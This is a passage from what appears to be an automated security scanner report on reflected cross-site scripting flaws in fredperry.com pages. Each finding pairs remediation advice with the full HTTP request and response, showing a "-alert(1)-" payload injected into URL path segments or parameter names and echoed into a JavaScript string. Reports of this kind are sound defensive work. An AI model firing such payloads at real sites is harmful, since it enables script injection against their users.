Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 48124

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Fred Pe
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/men/knitwear/?182cb"-alert(1)-"18aae9e5047=1");
//]]>
...[SNIP]...

1.119. http://www.fredperry.com/limited-edition/men/liberty-blank-canvas/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/liberty-blank-canvas/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 70f33"-alert(1)-"55941b02465 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition70f33"-alert(1)-"55941b02465/men/liberty-blank-canvas/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:09:45 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=bak51qld4c0iqbgdtpogctnhl1; expires=Tue, 09-Nov-2010 17:09:45 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29376

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition70f33"-alert(1)-"55941b02465/men/liberty-blank-canvas/");
//]]>
...[SNIP]...

1.120. http://www.fredperry.com/limited-edition/men/liberty-blank-canvas/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/liberty-blank-canvas/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 443a9"-alert(1)-"e720bf77e2a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/men443a9"-alert(1)-"e720bf77e2a/liberty-blank-canvas/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:10:15 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=h813f9bc0t7s20s9plqkq52q26; expires=Tue, 09-Nov-2010 17:10:15 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29376

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/men443a9"-alert(1)-"e720bf77e2a/liberty-blank-canvas/");
//]]>
...[SNIP]...

1.121. http://www.fredperry.com/limited-edition/men/liberty-blank-canvas/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/liberty-blank-canvas/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 55b43"-alert(1)-"a143e97bf8f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/men/liberty-blank-canvas55b43"-alert(1)-"a143e97bf8f/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:10:45 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=tr5obeucie5eqkimd9lql3i1v1; expires=Tue, 09-Nov-2010 17:10:45 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29376

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/men/liberty-blank-canvas55b43"-alert(1)-"a143e97bf8f/");
//]]>
...[SNIP]...

1.122. http://www.fredperry.com/limited-edition/men/liberty-blank-canvas/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/liberty-blank-canvas/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ec45f"-alert(1)-"932cb284aae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/men/liberty-blank-canvas/?ec45f"-alert(1)-"932cb284aae=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:09:08 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=n2lvemetp3uf61ntmcfdl2ese7; expires=Tue, 09-Nov-2010 17:09:09 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31641

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Liberty
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/men/liberty-blank-canvas/?ec45f"-alert(1)-"932cb284aae=1");
//]]>
...[SNIP]...

1.123. http://www.fredperry.com/limited-edition/men/new-styles/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/new-styles/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aafcd"-alert(1)-"ca9f7a6b3df was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-editionaafcd"-alert(1)-"ca9f7a6b3df/men/new-styles/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:10:14 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=02flunniengit26kuohu44o1c7; expires=Tue, 09-Nov-2010 17:10:14 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29366

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-editionaafcd"-alert(1)-"ca9f7a6b3df/men/new-styles/");
//]]>
...[SNIP]...

1.124. http://www.fredperry.com/limited-edition/men/new-styles/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/new-styles/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1c508"-alert(1)-"48cebfcb06f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/men1c508"-alert(1)-"48cebfcb06f/new-styles/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:10:37 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=k1u51f38e8cm2j4krda42f2rm4; expires=Tue, 09-Nov-2010 17:10:37 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29366

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/men1c508"-alert(1)-"48cebfcb06f/new-styles/");
//]]>
...[SNIP]...

1.125. http://www.fredperry.com/limited-edition/men/new-styles/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/new-styles/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ac829"-alert(1)-"50d8a14032a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/men/new-stylesac829"-alert(1)-"50d8a14032a/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:11:05 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=59kn1i9dtbvkogr6rl1mvbt6b7; expires=Tue, 09-Nov-2010 17:11:05 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29366

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/men/new-stylesac829"-alert(1)-"50d8a14032a/");
//]]>
...[SNIP]...

1.126. http://www.fredperry.com/limited-edition/men/new-styles/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/new-styles/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 76e7e"-alert(1)-"8e25b5ff5f5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/men/new-styles/?76e7e"-alert(1)-"8e25b5ff5f5=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:09:36 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=uii8f2bu4sdjkl14jhgqenv304; expires=Tue, 09-Nov-2010 17:09:36 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30868

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> New Sty
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/men/new-styles/?76e7e"-alert(1)-"8e25b5ff5f5=1");
//]]>
...[SNIP]...

1.127. http://www.fredperry.com/limited-edition/men/shirts/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/shirts/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c3bbe"-alert(1)-"0ef1f74b959 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-editionc3bbe"-alert(1)-"0ef1f74b959/men/shirts/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:13:16 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=ahcu0t9dl58c4ic4fiimqkn4j4; expires=Tue, 09-Nov-2010 17:13:16 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29362

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-editionc3bbe"-alert(1)-"0ef1f74b959/men/shirts/");
//]]>
...[SNIP]...

1.128. http://www.fredperry.com/limited-edition/men/shirts/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/shirts/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3b708"-alert(1)-"86e896e7b1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/men3b708"-alert(1)-"86e896e7b1/shirts/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:13:52 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=hajrgog5oo0eacbkbp05vslkm4; expires=Tue, 09-Nov-2010 17:13:52 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29361

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/men3b708"-alert(1)-"86e896e7b1/shirts/");
//]]>
...[SNIP]...

1.129. http://www.fredperry.com/limited-edition/men/shirts/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/shirts/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 66c85"-alert(1)-"c119ad27ab7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/men/shirts66c85"-alert(1)-"c119ad27ab7/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:14:13 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=oba1oi45aktor2om73s3ubdli3; expires=Tue, 09-Nov-2010 17:14:13 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29362

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/men/shirts66c85"-alert(1)-"c119ad27ab7/");
//]]>
...[SNIP]...

1.130. http://www.fredperry.com/limited-edition/men/shirts/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/shirts/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d34bf"-alert(1)-"05db03a5909 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/men/shirts/?d34bf"-alert(1)-"05db03a5909=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:11:38 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=3spam892hoo88moq3da5fa1633; expires=Tue, 09-Nov-2010 17:11:38 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 40942

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Fred Pe
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/men/shirts/?d34bf"-alert(1)-"05db03a5909=1");
//]]>
...[SNIP]...

1.131. http://www.fredperry.com/limited-edition/men/shorts/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/shorts/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 163c5"-alert(1)-"603148a5fb5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition163c5"-alert(1)-"603148a5fb5/men/shorts/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:12:50 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=ucne4doaae3jrhji44hi543ii4; expires=Tue, 09-Nov-2010 17:12:50 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29362

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition163c5"-alert(1)-"603148a5fb5/men/shorts/");
//]]>
...[SNIP]...

